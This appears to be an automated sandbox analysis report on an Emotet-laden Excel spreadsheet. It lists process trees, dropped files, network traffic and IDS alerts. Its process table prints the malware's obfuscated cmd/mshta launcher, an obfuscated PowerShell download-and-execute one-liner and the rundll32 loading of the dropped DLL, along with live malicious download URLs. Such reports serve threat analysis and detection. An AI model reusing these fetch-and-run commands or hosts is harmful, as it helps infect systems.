File name: | report 01 24 2022.xls |
Full analysis: | https://app.any.run/tasks/fcaec7dd-81ac-4d28-be2c-ad1388c67e2e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 24, 2022, 18:31:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 01:40:11 2022, Last Saved Time/Date: Mon Jan 24 01:57:49 2022, Security: 0 |
MD5: | 7D4831A889F935E5FA6004F12C11D9C3 |
SHA1: | E2079E67854C2AB4F3EC63D4B976E446C433108C |
SHA256: | 884400589FD2B1D61B2F88EDC5FD97AA90B2A4CD2277C07C4A468D3A0CBD2A1A |
SSDEEP: | 3072:yW+nBqmsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIXxe53lGvFTQ3IzxgdrvxpU0S:t+nBqmsk3hbdlylKsgqopeJBWhZFVE+S |
.xls | | | Microsoft Excel sheet (78.9) |
---|
Author: | xXx |
---|---|
LastModifiedBy: | xXx |
Software: | Microsoft Excel |
CreateDate: | 2022:01:24 01:40:11 |
ModifyDate: | 2022:01:24 01:57:49 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2232 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1888 | cmd /c ping google.com && timeout 4 && start ms^h^ta ht^tp:/^/0x^b^907d60^7/fe^r/f^e5.h^tm^l | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2740 | ping google.com | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2460 | timeout 4 | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2364 | mshta http://0xb907d607/fer/fe5.html | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
1936 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe5.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
3128 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\system32\SearchProtocolHost.exe | — | SearchIndexer.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Version: 7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211) | ||||
2404 | "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString | C:\Windows\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3368 | C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString | C:\Windows\SysWow64\rundll32.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1996 | C:\Windows\system32\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer | C:\Windows\system32\rundll32.exe | rundll32.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2232 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR274A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3012 | rundll32.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | |
MD5:5AA39E6B1DA7435D3F03749A9EEC72E1 | SHA256:D6F6C809E79E82631436CAFF61998071540140885993B9ED84753ADCC8FDB9DF | |||
3012 | rundll32.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:15A1999569D731346950C6F8360CDF52 | SHA256:5552A6CF55940A25156FF748883C78304EE3C51E6830043F69FB65B9E98322AD | |||
3012 | rundll32.exe | C:\Users\admin\AppData\Local\Temp\TarD0E9.tmp | cat | |
MD5:D99661D0893A52A0700B8AE68457351A | SHA256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003 | |||
2364 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe5[1].htm | binary | |
MD5:85C42FB32CB9993BB701ECA2A08287DB | SHA256:8696E887EB7047385790D045BDFAC93A857071BE3846ED6912CB2BA09D2053E9 | |||
1936 | powershell.exe | C:\Users\Public\Documents\ssd.dll | executable | |
MD5:5928EA4CDAD3A9769DA7F85BA24DF169 | SHA256:085BCE50E31F8AEC11DE06DAA65211F4AB52C3733CA7C0B0C19362EE3B87809A | |||
1996 | rundll32.exe | C:\Users\admin\AppData\Local\Qupolbegjjqoo\wprf.brb | executable | |
MD5:5928EA4CDAD3A9769DA7F85BA24DF169 | SHA256:085BCE50E31F8AEC11DE06DAA65211F4AB52C3733CA7C0B0C19362EE3B87809A | |||
1936 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jy3xzcg3.upo.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3012 | rundll32.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:ACAEDA60C79C6BCAC925EEB3653F45E0 | SHA256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658 | |||
1936 | powershell.exe | C:\Users\admin\AppData\Local\Temp\1r3c54jw.pnn.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2364 | mshta.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe5.html | FR | binary | 10.7 Kb | malicious |
1936 | powershell.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe5.png | FR | text | 1.05 Kb | malicious |
1936 | powershell.exe | GET | 200 | 46.51.216.192:80 | http://iwannago.dev.bizapps.sg/axedi/gtlf2pXOavEAOR/ | SG | executable | 780 Kb | suspicious |
1936 | powershell.exe | GET | 403 | 92.222.139.190:80 | http://dopevision.tn/wp-admin/SiXj7Yc9QQrTa/ | FR | html | 261 b | malicious |
3012 | rundll32.exe | GET | 200 | 23.32.238.178:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?cc3e329949c8166f | US | compressed | 59.9 Kb | whitelisted |
1936 | powershell.exe | GET | 404 | 89.46.105.75:80 | http://www.ufficiomodernosas.it/old/IzGP8VipCQxWMDuum/ | IT | html | 196 b | suspicious |
3012 | rundll32.exe | GET | 200 | 23.32.238.178:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?caff5126f7e2c9ce | US | compressed | 4.70 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 92.222.139.190:80 | dopevision.tn | OVH SAS | FR | malicious |
3012 | rundll32.exe | 80.211.3.13:8080 | — | Aruba S.p.A. | IT | suspicious |
1936 | powershell.exe | 89.46.105.75:80 | www.ufficiomodernosas.it | Aruba S.p.A. | IT | suspicious |
3012 | rundll32.exe | 23.32.238.178:80 | ctldl.windowsupdate.com | XO Communications | US | suspicious |
2364 | mshta.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
1936 | powershell.exe | 46.51.216.192:80 | iwannago.dev.bizapps.sg | Amazon.com, Inc. | SG | suspicious |
— | — | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
1936 | powershell.exe | 88.218.116.38:443 | www.top-art.co.il | — | ES | unknown |
1936 | powershell.exe | 103.104.73.107:443 | ss100feet.com | — | — | malicious |
1936 | powershell.exe | 3.211.126.45:443 | directorio.reservado.com.bo | — | US | unknown |
Domain | IP | Reputation |
---|---|---|
google.com |
| whitelisted |
dopevision.tn |
| malicious |
ss100feet.com |
| malicious |
directorio.reservado.com.bo |
| unknown |
www.top-art.co.il |
| unknown |
www.ufficiomodernosas.it |
| suspicious |
iwannago.dev.bizapps.sg |
| suspicious |
ctldl.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
1936 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1936 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1936 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3012 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 22 |
3012 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 5 |